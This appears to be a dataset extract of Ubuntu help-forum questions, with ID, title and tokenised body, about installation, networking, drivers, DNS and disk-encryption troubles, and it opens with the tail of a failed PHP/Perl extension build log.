works ... yes checking if cc static flag -static works ... yes checking if cc supports -c -o file.o ... yes checking if cc supports -c -o file.o ... ( cached ) yes checking whether the cc linker ( /usr/bin/ld -m elf_x86_64 ) supports shared libraries ... yes checking whether -lc should be explicitly linked in ... no checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking whether stripping libraries is possible ... yes checking if libtool supports shared libraries ... yes checking whether to build shared libraries ... yes checking whether to build static libraries ... no configure : creating ./config.status config.status : creating config.h config.status : executing libtool commands running : make /bin/bash /tmp/pear/temp/pear-build-rootcxwyp8/perl-1.0.1/libtool -- mode=compile cc -i . -i/tmp/pear/temp/perl -dphp_atom_inc -i/tmp/pear/temp/pear-build-rootcxwyp8/perl-1.0.1/include -i/tmp/pear/temp/pear-build-rootcxwyp8/perl-1.0.1/main -i/tmp/pear/temp/perl -i/usr/include/php5 -i/usr/include/php5/main -i/usr/include/php5/tsrm -i/usr/include/php5/zend -i/usr/include/php5/ext -i/usr/include/php5/ext/date/lib -dhave_config_h -g -o2 -d_reentrant -d_gnu_source -ddebian -fstack-protector -fno-strict-aliasing -pipe -i/usr/local/include -d_largefile_source -d_file_offset_bits=64 -i/usr/lib/perl/5.14/core -c /tmp/pear/temp/perl/php_perl.c -o php_perl.lo libtool : compile : cc -i . -i/tmp/pear/temp/perl -dphp_atom_inc -i/tmp/pear/temp/pear-build-rootcxwyp8/perl-1.0.1/include -i/tmp/pear/temp/pear-build-rootcxwyp8/perl-1.0.1/main -i/tmp/pear/temp/perl -i/usr/include/php5 -i/usr/include/php5/main -i/usr/include/php5/tsrm -i/usr/include/php5/zend -i/usr/include/php5/ext -i/usr/include/php5/ext/date/lib -dhave_config_h -g -o2 -d_reentrant -d_gnu_source -ddebian -fstack-protector -fno-strict-aliasing -pipe -i/usr/local/include -d_largefile_source -d_file_offset_bits=64 -i/usr/lib/perl/5.14/core -c /tmp/pear/temp/perl/php_perl.c -fpic -dpic -o .libs/php_perl.o /tmp/pear/temp/perl/php_perl.c:186:3 : warning : initialization from incompatible pointer type [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:186:3 : warning : ( near initialization for 'php_perl_object_handlers.read_property ' ) [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:187:3 : warning : initialization from incompatible pointer type [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:187:3 : warning : ( near initialization for 'php_perl_object_handlers.write_property ' ) [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:193:3 : warning : initialization from incompatible pointer type [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:193:3 : warning : ( near initialization for 'php_perl_object_handlers.has_property ' ) [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:194:3 : warning : initialization from incompatible pointer type [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:194:3 : warning : ( near initialization for 'php_perl_object_handlers.unset_property ' ) [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:198:3 : warning : initialization from incompatible pointer type [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:198:3 : warning : ( near initialization for 'php_perl_object_handlers.get_method ' ) [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:199:3 : warning : initialization from incompatible pointer type [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:199:3 : warning : ( near initialization for 'php_perl_object_handlers.call_method ' ) [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:202:3 : warning : initialization from incompatible pointer type [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:202:3 : warning : ( near initialization for 'php_perl_object_handlers.get_class_name ' ) [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:213:3 : warning : initialization from incompatible pointer type [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:213:3 : warning : ( near initialization for 'php_perl_proxy_handlers.read_property ' ) [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:214:3 : warning : initialization from incompatible pointer type [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:214:3 : warning : ( near initialization for 'php_perl_proxy_handlers.write_property ' ) [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:220:3 : warning : initialization from incompatible pointer type [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:220:3 : warning : ( near initialization for 'php_perl_proxy_handlers.has_property ' ) [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:221:3 : warning : initialization from incompatible pointer type [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:221:3 : warning : ( near initialization for 'php_perl_proxy_handlers.unset_property ' ) [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:225:3 : warning : initialization from incompatible pointer type [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:225:3 : warning : ( near initialization for 'php_perl_proxy_handlers.get_method ' ) [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:226:3 : warning : initialization from incompatible pointer type [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:226:3 : warning : ( near initialization for 'php_perl_proxy_handlers.call_method ' ) [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:229:3 : warning : initialization from incompatible pointer type [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:229:3 : warning : ( near initialization for 'php_perl_proxy_handlers.get_class_name ' ) [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:247:1 : warning : excess elements in struct initializer [ enabled by default ] /tmp/pear/temp/perl/php_perl.c:247:1 : warning : ( near initialization for 'php_perl_constructor_function ' ) [ enabled by default ] /tmp/pear/temp/perl/php_perl.c : in function 'php_perl_sv_to_zval_noref ' : /tmp/pear/temp/perl/php_perl.c:540:7 : warning : passing argument 3 of 'perl_sv_2pv_flags ' from incompatible pointer type [ enabled by default ] in file included from /usr/lib/perl/5.14/core/perl.h:5036:0 , from /tmp/pear/temp/perl/php_perl.c:38 : /usr/lib/perl/5.14/core/proto.h:3565:21 : note : expected 'strlen * const ' but argument is of type 'int *' /tmp/pear/temp/perl/php_perl.c:587:18 : warning : format ' % ld ' expects argument of type 'long int ' , but argument 3 has type 'unsigned int ' [ -wformat ] /tmp/pear/temp/perl/php_perl.c : in function 'php_perl_call_method ' : /tmp/pear/temp/perl/php_perl.c:680:11 : warning : passing argument 3 of 'perl_sv_2pv_flags ' from incompatible pointer type [ enabled by default ] in file included from /usr/lib/perl/5.14/core/perl.h:5036:0 , from /tmp/pear/temp/perl/php_perl.c:38 : /usr/lib/perl/5.14/core/proto.h:3565:21 : note : expected 'strlen * const ' but argument is of type 'int *' /tmp/pear/temp/perl/php_perl.c : in function 'php_perl_call ' : /tmp/pear/temp/perl/php_perl.c:743:11 : warning : passing argument 3 of 'perl_sv_2pv_flags ' from incompatible pointer type [ enabled by default ] in file included from /usr/lib/perl/5.14/core/perl.h:5036:0 , from /tmp/pear/temp/perl/php_perl.c:38 : /usr/lib/perl/5.14/core/proto.h:3565:21 : note : expected 'strlen * const ' but argument is of type 'int *' /tmp/pear/temp/perl/php_perl.c : in function 'php_perl_get_method ' : /tmp/pear/temp/perl/php_perl.c:1418:5 : error : too few arguments to function 'zend_get_std_object_handlers ( ) - > get_method' /tmp/pear/temp/perl/php_perl.c : in function 'php_perl_get_properties ' : /tmp/pear/temp/perl/php_perl.c:1496:29 : error : 'znode_op ' has no member named 'op_type' /tmp/pear/temp/perl/php_perl.c:1497:29 : error : 'znode_op ' has no member named 'u' /tmp/pear/temp/perl/php_perl.c:1498:12 : error : 'znode_op ' has no member named 'u' /tmp/pear/temp/perl/php_perl.c:1498:12 : error : 'znode_op ' has no member named 'u' /tmp/pear/temp/perl/php_perl.c:1499:12 : error : 'znode_op ' has no member named 'u' /tmp/pear/temp/perl/php_perl.c:1499:12 : error : 'znode_op ' has no member named 'u' /tmp/pear/temp/perl/php_perl.c:1500:12 : error : 'znode_op ' has no member named 'u' /tmp/pear/temp/perl/php_perl.c:1500:12 : error : 'znode_op ' has no member named 'u' /tmp/pear/temp/perl/php_perl.c:1501:12 : error : 'znode_op ' has no member named 'u' /tmp/pear/temp/perl/php_perl.c:1501:12 : error : 'znode_op ' has no member named 'u' /tmp/pear/temp/perl/php_perl.c:1502:12 : error : 'znode_op ' has no member named 'u' /tmp/pear/temp/perl/php_perl.c:1502:12 : error : 'znode_op ' has no member named 'u' /tmp/pear/temp/perl/php_perl.c : in function 'php_perl_clone ' : /tmp/pear/temp/perl/php_perl.c:1666:7 : warning : format ' % ld ' expects argument of type 'long int ' , but argument 3 has type 'unsigned int ' [ -wformat ] /tmp/pear/temp/perl/php_perl.c : in function 'zm_info_perl ' : /tmp/pear/temp/perl/php_perl.c:1843:3 : warning : unknown conversion type character 'v ' in format [ -wformat ] /tmp/pear/temp/perl/php_perl.c : in function 'zim_perl_eval ' : /tmp/pear/temp/perl/php_perl.c:1905:13 : warning : passing argument 3 of 'perl_sv_2pv_flags ' from incompatible pointer type [ enabled by default ] in file included from /usr/lib/perl/5.14/core/perl.h:5036:0 , from /tmp/pear/temp/perl/php_perl.c:38 : /usr/lib/perl/5.14/core/proto.h:3565:21 : note : expected 'strlen * const ' but argument is of type 'int *' make : *** [ php_perl.lo ] error 1 error : `make ' failed www-data @ ubuntu-server : /var/virtual/storyzer.com/testperl $ exit logout
245997	issues in installation of mongo db	i was installing mongo db on my ubuntu-12.04 system , but while i give the following command in my terminal apt-key adv -- keyserver keyserver.ubuntu.com -- recv 7f0ceb10 it gives me the following error gpg : requesting key 7f0ceb10 from hkp server keyserver.ubuntu.com gpg : keyserver timed out gpg : keyserver receive failed : keyserver error is there any other way of installing mongo db or what can be done to avoid the above situation ?
246000	why my dell studio 1555 getting over heated in ubuntu 11.10 ?	but when i use windows 7 it is so silent i barely hear any sound from fan . i 'm using standard graphics card drivers released by ati i 'm not using additional video drivers which are open source . windows 7 is so hardware efficient it is running so efficiently on 5 years old laptop & linux is struggling to run efficiently on it . i thought linux 's were more efficient than windows but ubuntu proved me wrong.do n't suggest me to use ubuntu 12.10 because graphics drivers are not available for my ati 45xx graphics card.do n't tell me switch to older ubuntu versions i faced the same problems there also.my bios version is a13 which is the latest & is up-to-date .
246003	how to show art in terminal	i want to the ubuntu terminal to show art like this picture : how to do that ? i want put my own logo using the word character . i would like to arrange it and form a logo . please teach me the way..
246009	how can i use bind9 to use my own custom domain in my lan ?	i 'm new to dns and making a dns server . i 've read through the bind9 server how to ( at https : //help.ubuntu.com/community/bind9serverhowto ) and several tutorials online on setting up a bind9 server in ubuntu . i have n't gotten any of them to work yet . i 'm trying to get fivestones.desonia to resolve to my computers lan ip address of 192.168.1.139 . my named.conf.options file : options { directory `` /var/cache/bind '' ; // if there is a firewall between you and nameservers you want // to talk to , you may need to fix the firewall to allow multiple // ports to talk . see http : //www.kb.cert.org/vuls/id/800113 // if your isp provided one or more ip addresses for stable // nameservers , you probably want to use them as forwarders . // uncomment the following block , and insert the addresses replacing // the all-0 's placeholder . forwarders { 8.8.8.8 ; 8.8.4.4 ; } ; //======================================================================== // if bind logs error messages about the root key being expired , // you will need to update your keys . see https : //www.isc.org/bind-keys //======================================================================== dnssec-validation auto ; auth-nxdomain no ; # conform to rfc1035 listen-on-v6 { any ; } ; } ; my named.conf.local file : # // # // do any local configuration here # // # // consider adding the 1918 zones here , if they are not used in your # // organization # //include `` /etc/bind/zones.rfc1918 '' ; zone `` fivestones.desonia '' { type master ; file `` /etc/bind/zones/db.fivestones.desonia '' ; } ; zone `` 1.168.192.in-addr.arpa '' { type master ; notify no ; file `` /etc/bind/zones/db.192 '' ; } ; my /etc/bind/zones/db.192 file : ; ; bind reverse data file for local loopback interface ; $ ttl 604800 @ in soa ns.fivestones.desonia . root.fivestones.desonia . ( 2013012113 ; serial 604800 ; refresh 86400 ; retry 2419200 ; expire 604800 ) ; negative cache ttl ; @ in ns ns . 10 in ptr ns.fivestones.desonia . my /etc/bind/zones/db.fivestones.desonia file ; ; bind data file for local loopback interface ; $ ttl 604800 @ in soa ns.fivestones.desonia . root.fivestones.desonia . ( 2013012110 ; serial 604800 ; refresh 86400 ; retry 2419200 ; expire 604800 ) ; negative cache ttl ; @ in ns ns.fivestones.desonia . ns in a 192.168.1.139 server in a 192.168.1.139 www in a 192.168.1.139 i sudo service bind9 restart and then this is my tail -f /var/log/syslog : jan 21 23:47:25 media-server named [ 16726 ] : command channel listening on 127.0.0.1 # 953 jan 21 23:47:25 media-server named [ 16726 ] : command channel listening on : :1 # 953 jan 21 23:47:25 media-server named [ 16726 ] : zone 0.in-addr.arpa/in : loaded serial 1 jan 21 23:47:25 media-server named [ 16726 ] : zone 127.in-addr.arpa/in : loaded serial 1 jan 21 23:47:25 media-server named [ 16726 ] : zone 1.168.192.in-addr.arpa/in : loaded serial 2013012113 jan 21 23:47:25 media-server named [ 16726 ] : zone 255.in-addr.arpa/in : loaded serial 1 jan 21 23:47:25 media-server named [ 16726 ] : zone fivestones.desonia/in : loaded serial 2013012110 jan 21 23:47:25 media-server named [ 16726 ] : zone localhost/in : loaded serial 2 jan 21 23:47:25 media-server named [ 16726 ] : managed-keys-zone ./in : loaded serial 2 jan 21 23:47:25 media-server named [ 16726 ] : running but when i try to host -l fivestones.desonia i get ; transfer failed . host fivestones.desonia not found : 9 ( notauth ) ; transfer failed . and if i try to ping fivestones.desonia i get ping : unknown host fivestones.desonia . if i host google.com i get google.com has address 74.125.227.96 google.com has address 74.125.227.97 google.com has address 74.125.227.98 google.com has address 74.125.227.99 google.com has address 74.125.227.100 google.com has address 74.125.227.101 google.com has address 74.125.227.102 google.com has address 74.125.227.103 google.com has address 74.125.227.104 google.com has address 74.125.227.105 google.com has address 74.125.227.110 google.com has ipv6 address 2607 : f8b0:4000:800 : :1004 google.com mail is handled by 20 alt1.aspmx.l.google.com . google.com mail is handled by 30 alt2.aspmx.l.google.com . google.com mail is handled by 40 alt3.aspmx.l.google.com . google.com mail is handled by 50 alt4.aspmx.l.google.com . google.com mail is handled by 10 aspmx.l.google.com . so at least that 's working . but host fivestones.desonia does nothing . if i dig fivestones.desonia i get ; < < > > dig 9.8.1-p1 < < > > fivestones.desonia ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : noerror , id : 57727 ; ; flags : qr aa rd ra ; query : 1 , answer : 0 , authority : 1 , additional : 0 ; ; question section : ; fivestones.desonia . in a ; ; authority section : fivestones.desonia . 604800 in soa ns.fivestones.desonia . root.fivestones.desonia . 2013012110 604800 86400 2419200 604800 ; ; query time : 1 msec ; ; server : 127.0.0.1 # 53 ( 127.0.0.1 ) ; ; when : mon jan 21 23:51:40 2013 ; ; msg size rcvd : 80 ... which seems like it 's working . but it does n't work . and finally if i wget fivestones.desonia ( the computer is running apache ) i get resolving fivestones.desonia ( fivestones.desonia ) ... failed : name or service not known . wget : unable to resolve host address `fivestones.desonia' what am i doing wrong ? or what other info would you need to help me figure this out ? thanks so much !
246015	wget cookies.txt problem	i use wget like this : wget -- load-cookies cookies.txt downloadlink the download is successful . but the problem is that it stores useless files from the link to the directory after i delete it for many times . it auto creates www.mylink.com dir in the directory no matter how many times i delete it . i try to find where the cookies is saved on my server so i can delete them , but i ca n't find them . i hope someone can help as the files that are automatically stored are getting bigger each second . also there 's a file called .fuse_hidden0345bd8d000004e3 which is getting bigger too , and i ca n't delete it either .
246016	how to debug faulty hardware that causes freezing	i have an old desktop box that seems to freeze quite often while running ubuntu . sometimes it takes 1-2 min after boot , sometimes 30 min , sometimes it can run for days just fine . upon freezing the screen just stays constant , and no mouse or keyboard input works ( there is no screen of death ) . i am pretty confident it is a hardware problem , so want to replace the motherboard , the cpu , the video card ( nvidia ) or the power supply . i need some help to figure out which one is the faulty one . i rejected the memory because i can run memtest for extensive period of time without any issues . which logs in ubuntu would point me to a possible hardware failure on reboot after a freeze ? or what tools can stress test different components .
246026	how to recover ubuntu data if it 's installed inside windows ?	i want to install ubuntu inside windows . however , if windows gets corrupted , how can data from the ubuntu system be recovered ?
246028	no wifi with ubuntu 12.10 macbook pro retina ( 15 '' & 16gb ram )	i have tried to make the wifi work on the newest version of macbookpro retina ( 15 '' ) for the last 2 days but could n't make it work . your help would be much appreciated . here are the several ways i tried install wifi driver -sudo apt-get update & & sudo apt-get install b43-fwcutter -download driver . -tar -xf broadcom-wl-5.100.138.tar.bz2 -sudo b43-fwcutter -w /lib/firmware broadcom-wl-5.100.138/linux/wl_apsta.o -reboot and the wireless should work . this did n't work for me . so i tried this way . you can install the firmware manually : wget http : //www.lwfinger.com/b43-firmware/broadcom-wl-5.100.138.tar.bz2 tar xf broadcom-wl-5.100.138.tar.bz2 sudo apt-get install b43-fwcutter sudo b43-fwcutter -w `` /lib/firmware '' broadcom-wl-5.100.138/linux/wl_apsta.o this did n't work either . then i tried how it is explained on this link i get the message `` '' module build for the currently running kernel was skipped since the kernel source for this kernel does not seem to be installed '' and did n't work either . since it 's asking me to install kernal source , i installed bothlinux-headers-3.5.0-17-generic and sudo apt-get install linux-source linux-headers-generic . but i still get the message `` module build for the currently running kernel was skipped since the kernel source for this kernel does not seem to be installed '' i was able to install ubuntu 12.10 on all other old pcs except for this macbook pro retina ... . not sure if this is going to be helpful but here is my computer info : 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:01.1 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:01.2 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm77 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation device 0fd5 ( rev a1 ) 01:00.1 audio device : nvidia corporation device 0e1b ( rev a1 ) 03:00.0 ethernet controller : broadcom corporation device 16a3 ( rev 10 ) 03:00.1 sd host controller : broadcom corporation netxtreme bcm57765 memory card reader ( rev 10 ) 04:00.0 network controller : broadcom corporation bcm4331 802.11a/b/g/n ( rev 02 ) thank you for your help
246030	how do i force 12.04 lts to upgrade ?	i ca n't make the upgrade manager show me the new version ( 12.10 ) . software sources has the `` for any new version '' options selected but i ca n't get 12.10 to show up in the update manager .
246035	ubuntu sidebar on desktop stopped showing	i decided to give ubuntu a try after all these years using only windows as os . i downloaded that windows installer from their site and installed ubuntu . everything went well until i decided to update the drivers and apps . it seems to be a bad idea , because i ca n't see the sidebar anymore ( the one with the `` quick launch options '' ) and some graphic elements from the os are not present , like the top bar with the clock . another issue : i always see an error regarding compiz after a couple of minutes , saying that it stopped responding . am i missing something ? i 'm using the 12.10 64bit version . edit i googled about the problem and it seems that compiz is bugged like hell in 12.10 . i 'm uninstalling it and giving 12.04 a try . that 's too bad , because i like many features from this version , specially the use and feel . but i ca n't stand using it without the left bar and a graphic interface at all .
246036	inspiron 14r energy	the battery of my notebook is ending very quickly when i use ubuntu . i have a dell inspiron 14r with 6 gb memory , 1tb and nvdia gt630m hd . someone can tell me what i can do to improve it ?
246037	what happens to cronjobs scheduled when the server is off ?	i have an ubuntu server 12 which is n't on all day . in the /etc/crontab , i see that cron.daily , cron.weekly and cron.monthly are scheduled at times the server is off , usually . what happens with those tasks ? will they just be skipped , or runned as soon as the server is on again ?
246041	package network-manager-openvpn is not available , but is referred to by another package	i 'm trying out ubuntu 's live cd and have booted in from a usb . i want to check if it will work with my vpn or not . i already have network manager installed , but when i go to configure vpns , i can only see pptp as an option , while i need to add an openvpn type of vpn . following the instructions on my vpn 's documentation i tried to install openvpn using this : sudo apt-get install network-manager-openvpn but i get the response : reading package lists ... done building dependency tree reading state information ... done package network-manager-openvpn is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'network-manager-openvpn ' has no installation candidate any ideas what the issue is ?
246043	how do i get rid of frequent error messages ?	i am sometimes getting error messages like the ones below . as i understand they are from some kind of debugging mode in the beta which i sometimes install . i have no problem with them in the beta . if i install it i do because i want to report bugs . but if i switch to productivity i do n't want them . until 12.10 they stopped when the final was released and i upgraded , but not this time . i 'm not experiencing anything not working so the messages just annoy me by now . can anyone tell me how to disable them ?
246045	ubuntu 12.10 is increasingly slower until compiz is restarted through change in ccsm	after installing ubuntu 12.10 on my machine i 've noticed that it grows increasingly slower and slower until i change a setting in compiz config settings manager which somehow restarts compiz and leaves my computer superfast again . then , after another hour , the computer is so slow that it takes 10 seconds to see all the windows in the window expo view ( super+w ) . i 've tried some of the regular suggestions about how to fix this but nothing helps for more than one hour . any suggestions ? computer : dell latitude e6420 with core i5 .
246047	how do the keyboard shortcuts for ubuntu ( with unity ) compare to those of windows ?	until today , i was using windows . now i have migrated to ubuntu 12.10 . what are the keyboard shortcuts for basic commands like copy , cut and paste ? how do they differ from windows ?
246052	how to unencrypt encrypted home directory ?	i got hdd replaced in my noteboook and now trying to read encrypted home directory from old hdd under freshly installed ubuntu . i tried mount -t ecryptfs /mnt/old_disk/username/.private/.private /mnt/old_home it mounted the old home , but all files have strange names like ecryptfs_fnek_encrypted.fwb ... . as suggested here http : //askubuntu.com/a/77807/59478 i answered defaults to all questions except `` enable filename encryption `` . any ideas ? best regards , eugene .
246057	remove usb dual boot ubuntu 12.10 ?	i have windows 7 and ubuntu 12.10 . i installed ubuntu 12.10 onto my usb . but on boot , even though my usb is not in the computer , i still have the option to select ubuntu . when i select ubuntu , i can not boot into it as the usb is not in . how can i remove/uninstall ubuntu 12.10 from my computer completely ?
246058	installing ubuntu on hp envy 4 - 1104tx ( preinstalled windows 8 )	i have been using linux for more than 2 years now . i had hp pavilion dv4 laptop and ubuntu 12.04 was working great . i recently purchased hp envy 4 - 1104tx which has windows 8 preinstalled . i tried to install ubuntu 12.04 but since it is not much compatible with ufei , i downloaded 64 bit iso of ubuntu 12.10 . made a liveusb using unetbootin 583 . i followed installing ubuntu on a pre-installed uefi supported windows 8 system but still i am not able to boot with liveusb . i disabled secure boot . there is no option for fast boot or anything as such . it still would n't work . i also tried booting through legacy , but i 'm unable to install via liveusb . is there any other way ? i do n't have ssd so no problem of fake raid . is there some way by which i can install ubuntu ( 12.04 preferred ) ? i do n't care about windows 8 . is there any way via which i can install ubutnu over windows 8 ? ( i do n't have a cd/dvd rom ) .
246064	script/tool to clone a ubuntu server	i have installed and configured a ubuntu server ( installing additional packages and making modifications to some configuration files ) . now i would like to install an almost identical system , which has just a different ip , hostname , or anything like these . is there any script or tool that can automate this process ? i am not looking for something like clonezilla , which makes an image clone . i am not looking for something like remastersys , which creates an iso image . i would like something like this : http : //www.debianadmin.com/clone-your-ubuntu-installation.html or this : http : //ubuntuforums.org/showthread.php ? t=525660 , but more complete and automatic . basically , this tool should scan the existing system and extract a list of packages that are installed . then compare the configuration files on the system with the default configuration files of each package and generate diffs where they are different . however it should also identify the configurations that are different for each server ( like ip , hostname , etc . ) and give an option to customize them . all this should be done automatically , and the output should be a very small sized `` dna '' of the current system . then a tool like debootstrap should be used to install the new system , and the changes that are described on the `` dna '' should be applied to it : installing new packages and modifying their configuration files . about the motivation : i manage a virtual web server in cloud where i have made lots of configurations over time : related to security , different packages etc . now , if i want to build another server that has the same function and purpose as the first one , the long and tedious way would be to go over all the installations and configurations again , and still i may miss something . i thought that maybe there is any tool out there that can make something like a diff between the current state of the server and the initial state of a just installed server . this diff would also help me to audit the current system , i do n't exactly remember all the things that i have touched and messed in it . such a diff could also serve as a recipe that i can share with my friends , if they want to build a system like mine . it would be much more convenient and safe than passing around huge tarballs or images . the tools suggested for cloning : some of the tools suggested are : mondorescue clonezilla remastersys tklbam snap cobbler puppet cfengine chef but none of them is suitable for my case .
246068	gtk-builder-convert error	i am doing the tutorial in the link http : //www.micahcarrick.com/gtk-glade-tutorial-part-1.html when i run the gtk-builder-convert tutorial.glade tutorial.xml i get the following error traceback ( most recent call last ) : file `` /usr/bin/gtk-builder-convert '' , line 799 , in < module > sys.exit ( main ( sys.argv ) ) file `` /usr/bin/gtk-builder-convert '' , line 787 , in main conv.parse_file ( input_filename ) file `` /usr/bin/gtk-builder-convert '' , line 162 , in parse_file self._parse ( ) file `` /usr/bin/gtk-builder-convert '' , line 234 , in _parse assert glade_iface , ( `` badly formed xml , there is `` assertionerror : badly formed xml , there is no < glade-interface > tag . the glade file looks like this : < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < interface > < ! -- interface-requires gtk+ 3.0 -- > < object class= '' gtkwindow '' id= '' window '' > < property name= '' can_focus '' > false < /property > < property name= '' title '' translatable= '' yes '' > gtk+ text editor < /property > < signal name= '' destroy '' handler= '' on_window_destroy '' swapped= '' no '' / > < child > < placeholder/ > < /child > < /object > < /interface > note : the glade file was generated using glade 3.14.0 in ubuntu 12.10
246069	no init found . try passing init = bootarg in ubuntu	i have tried many options , but so far none was the solution . i booted the pc using ubuntu livecd . then in terminal , i ran the command : sudo fdisk -l it showed all the disk details . then i ran this command : sudo fsck -y/dev/sda1 the output was : fsck from util-linux-ng 2.17.2 then i restarted the system again , and the message prompted was : `` no init found . try passing init = bootarg '' ( initramfs ) : please help me out i have important data in this system .
246070	pc is not detecting any boot drive . how to fix this ?	i used gparted to shrink the swap space and add it to the drive that had ubuntu installed in it from live boot . after doing so , i restarted the computer and then found a black screen saying just this : no bootable device -- insert boot disk and press any key . help . thanks in advance . edit : i installed grub again , mounting the drive in which linux is installed . still , it gives the same message .
246077	how to setup a static ip for network-manager in virtual box on ubuntu server	hi there is anyone familiar with the non-gui version of ubuntus network manager ? i 'd like to set up a static ip with it in virtualbox without touching the file /etc/network/interfaces . ip : 192.168.56.101 gateway : 102.168.1.1 netmask : 255.255.255.0 additionally i 'd like to set up a second network interface with a dynamic ip to get connected to the internet with the vbox .
246081	how to disable the task pane in libreoffice	how to disable the annoying task pane from appearing everytime i run impress from libreoffice . i do not want to keep going everytime to untick it in the view tab .
246089	how to set up an sstp server	is there a way to set up a linux based , preferably ubuntu , sstp server ? i know there is a sstp client available on sourceforge , but i ca n't find a server . to be clear : i do not want openvpn , i want sstp
246096	reinstall virtualbox on ubuntu 12.04.1	my virtualbox used to work , but now it is for some reason completely fubar : every time i try to start a vm , it crashes my host ubuntu 12.04.1 system , i ca n't even bring it to reboot with the magic sysrq key . i would like to clean up the mess and reinstall a working virtualbox . i thought this would do : sudo apt-get remove virtualbox # reboot sudo apt-get install virtualbox but i get the same effect : even when downloading a fresh iso of any kind and starting the vm , it crashes the computer and i need to do a hard reboot . edit : as per commented , i installed version 4.2 using these instructions : wget -q http : //download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -o- | sudo apt-key add - sudo sh -c 'echo `` deb http : //download.virtualbox.org/virtualbox/debian precise contrib '' > > /etc/apt/sources.list ' sudo apt-get update & & sudo apt-get install virtualbox-4.2 ran virtualbox , checked the version : 4.2.6 r82870 it did n't crash , so problem solved . ( copy+paste to answer ) any ideas ?
246099	how to modify default printscreen behaviour ?	the prnt scrn button currently takes a screenshot and saves it in ~/pictures . how can i modify the behaviour i want for the prnt scrn button ? use case : i want to take a screenshot and go to gimp and quickly use ctrl+shift+v to paste the screenshot . if i do it now , i see : gimp message there is no image data in the clipboard to paste .
246100	how to dual-boot ubuntu on a separate drive ?	i want to install ubuntu on a separate drive with windows 7 64-bit on the primary drive . how do i do this ?
246102	slow ssd + dm-crypt with luks encryption in ubuntu 12.10	i have an 128 gb ssd installed in my laptop ( samsung 840 pro ) on a sata 3 interface . this laptop also has an i5 3210m ivy bridge intel processor and 8 gb of ram . i installed ubuntu 12.10 , using the graphical installer to get full-disk encryption . i am kind of disappointed , because i was expecting the specs i have to yield better results than what i get . while looking at this ssd benchmarking page it claims that my processor is able to do : ~500 mb/s : with aes-ni ~200 mb/s : without aes-ni looking at the numbers i get , i think i may not have aes-ni enabled . but first ... reading unencrypted data is fast : # hdparm -tt /dev/sda1 /dev/sda1 : timing cached reads : 14814 mb in 2.00 seconds = 7411.70 mb/sec timing buffered disk reads : 242 mb in 0.48 seconds = 502.75 mb/sec that 's actually close to my ssd 's specs of `` up to 530 mb/s '' and doing a dd test yields similar results to the above . writing encrypted data is fast too with dm-crypt ( otherwise with ecryptfs the performance on writing is abysmal , lower than 100 mb/s ) , the numbers being close to the ssd spec ( i guess writing is buffered or something ) : # dd if=/dev/zero of=tempfile bs=1m count=1024 conv=fdatasync , notrunc 1024+0 records in 1024+0 records out 1073741824 bytes ( 1.1 gb ) copied , 2.93896 s , 365 mb/s reading encrypted data is however another story : # echo 3 > /proc/sys/vm/drop_caches # dd if=tempfile of=/dev/null bs=1m count=1024 1024+0 records in 1024+0 records out 1073741824 bytes ( 1.1 gb ) copied , 5.85956 s , 183 mb/s while writing this message , i actually got lucky to get 183 mb/s , because this number varies . normally it 's somewhere around 150 mb/s , but i also got close to 300 mb/s on a fresh boot , but then performance drops gradually to under 200 mb/s without me starting any apps . do note that while conducting this test i have no other processes that are doing i/o ( as seen with iotop ) . also , here 's the test with hdparm which yields worse results : # hdparm -tt /dev/mapper/sda2_crypt /dev/mapper/sda2_crypt : 